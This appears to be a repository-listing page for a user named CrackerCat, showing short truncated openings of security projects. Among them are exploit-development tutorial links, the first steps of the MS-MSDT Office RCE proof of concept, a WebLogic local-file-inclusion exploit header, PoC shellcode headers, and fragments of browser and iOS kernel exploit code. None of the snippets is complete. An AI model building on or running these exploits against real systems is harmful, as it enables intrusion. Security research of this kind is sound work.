CrackerCat

#!/usr/bin/env python3
import sys
import struct

SPARSE_HEADER_SIZE = 28
SPARSE_HEADER_MAGIC = 0xED26FF3A
SPARSE_HEADER_MAJOR_VER = 1

SPARSE_CHUNK_SIZE = 12
SPARSE_CHUNK_TYPE_RAW = 0xCAC1

CrackerCat

http://whitelist1.com/
https://ocw.cs.pub.ro/courses/cns/labs/start
https://windowsexploit.com/blog
https://www.securitysift.com/windows-exploit-development-part-1-basics/
http://6.www.shogunlab.com/blog/2017/08/19/zdzg-windows-exploit-1.html
http://corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
https://tuts4you.com/e107_plugins/download/download.php?list.17=
https://learnxinyminutes.com/docs/c/
http://www.thegreycorner.com/
http://www.dmi.unipg.it/bista/didattica/sicurezza-pg/buffer-overrun/hacking-book/0x2a0-writing_shellcode.html

CrackerCat

"""
summary: drawing custom graphs
description:
  Showing custom graphs, using `ida_graph.GraphViewer`. In addition,
  show how to write actions that can be performed on those.
keywords: graph, actions
"""

from __future__ import print_function
# -----------------------------------------------------------------------

CrackerCat

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

CrackerCat

# Exploit Title: Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion
# Date: 25/1/2022
# Exploit Author: Jonah Tan (@picar0jsu)
# Vendor Homepage: https://www.oracle.com
# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
# Tested on: Windows Server 2019
# CVE : CVE-2022-21371

# Description

CrackerCat

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;
;;; Copyright (C), zznop, brandonkmiller@protonmail.com
;;;
;;; This software may be modified and distributed under the terms
;;; of the MIT license.  See the LICENSE file for details.
;;;
;;; DESCRIPTION
;;;
;;; This PoC shellcode is meant to be compiled as a blob and prepended to a ELF

CrackerCat

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;
;;; Copyright (C), zznop, brandonkmiller@protonmail.com
;;;
;;; This software may be modified and distributed under the terms
;;; of the MIT license.  See the LICENSE file for details.
;;;
;;; DESCRIPTION
;;;
;;; This PoC shellcode is meant to be compiled as a blob and prepended to a ELF

CrackerCat

function sleep( sleepDuration ){
    var now = new Date().getTime();
    while(new Date().getTime() < now + sleepDuration){ /* do nothing */ } 
}
function gc() {
    for (let i = 0; i < 0x10; i++) {
            new ArrayBuffer(0x1000000);
        }
}
let data_view = new DataView(new ArrayBuffer(8));

CrackerCat

<script>
    function gc() {
        for (var i = 0; i < 0x80000; ++i) {
            var a = new ArrayBuffer();
        }
    }

let shellcode = [

// Move x18 to x28 (TEB)

CrackerCat

// Bugs by NSO Group / Ian Beer.
// Exploit by Siguza & tihmstar.
// Thanks also to Max Bazaliy.

#include <stdint.h>             // uint32_t, uint64_t
#include <stdio.h>              // fprintf, stderr
#include <string.h>             // memcpy, memset, strncmp
#include <unistd.h>             // getpid
#include <mach/mach.h>
#include <stdlib.h>